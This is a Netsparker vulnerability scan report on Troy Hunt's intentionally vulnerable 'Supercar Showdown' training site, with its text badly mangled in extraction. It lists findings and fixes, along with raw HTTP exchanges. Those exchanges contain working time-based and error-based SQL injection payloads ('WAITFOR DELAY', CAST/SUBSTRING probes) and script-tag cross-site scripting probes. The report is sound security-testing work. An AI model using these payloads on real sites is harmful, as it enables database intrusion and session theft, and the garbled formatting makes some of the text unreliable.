Injection RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 77Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=223e3cnet+sparker3dnetsparker(0x00043F)3e
Identification RequestGET Supercar3 HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Injection ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232053 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
Identification Responsehellip1))ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000))11))0)=1lttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgtgtltnet sparker=netsparker(0x00043F)gtlttdgtlttrgtlttrgtlttdgtTroy Huntlttdgtlttdgt-1OR1=1)ANDISNULL(ASCII(SUBSTRING(CAST((SELECTversion)ASvarchar(8000)hellip
19 57
1 TOTALIMPORTANT
CONFIRMED
1
5 Password Transmitted over HTTPNetsparkerdetectedthatpassworddataisbeingtransmittedoverHTTP
ImpactIfanattackercaninterceptnetworktrafficheshecanstealuserscredentials
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformsandpagestoHTTPSanddonotservethemoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
51 AccountRegister CONFIRMEDhttphackyourselffirsttroyhuntcomAccountRegister
Form target actionhttphackyourselffirsttroyhuntcomAccountRegister
RequestGET AccountRegister HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2265Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtRegister - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
20 57
1 TOTALIMPORTANT
CONFIRMED
1
6 Cookie Not Marked as SecureNetsparkeridentifiedacookienotmarkedassecureandtransmittedoverHTTPS
Thismeansthecookiecouldpotentiallybestolenbyanattackerwhocansuccessfullyinterceptanddecryptthetrafficorfollowingasuccessfulman-in-the-middleattack
ImpactThiscookiewillbetransmittedoveraHTTPconnectionthereforeifthiscookieisimportant(such as a session cookie)anattackermightinterceptitandhijackavictimssessionIftheattackercancarryoutaman-in-the-middleattackheshecanforcethevictimtomakeanHTTPrequesttostealthecookie
Actions to Take1 Seetheremedyforsolution2 Markallcookiesusedwithintheapplicationassecure(If the cookie is not related to authentication or does not carry any personal
information you do not have to mark it as secure)
RemedyMarkallcookiesusedwithintheapplicationassecure
Required Skills for Successful ExploitationToexploitthisissuetheattackerneedstobeabletointercepttrafficThisgenerallyrequireslocalaccesstothewebserverortothevictimsnetworkAttackersneedtobeunderstandlayer2havephysicalaccesstosystemseitheraswaypointsforthetrafficorhavelocallygainedaccesstotoasystembetweenthevictimandthewebserver
External ReferencesNETCookieSecurePropertyHowtoCreateTotallySecureCookies
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-614CAPEC-102WASC-15
61 AccountLogin CONFIRMEDhttpshackyourselffirsttroyhuntcomAccountLogin
Identified CookieAuthCookie
RequestPOST AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccountLoginAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 57Content-Type applicationx-www-form-urlencoded
Email=netsparker40examplecomampPassword=3ampRememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
RequestGET Make1orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230021 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtNissans - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
12 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527-
ParametersParameter Type Value
orderBy GET 1 WAITFOR DELAY 0025--
asc GET false
RequestGET SupercarLeaderboardorderBy=1+WAITFOR+DELAY+2703a03a2527--ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
6 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 231609 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2885Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtSupercar Leaderboard - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
13 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
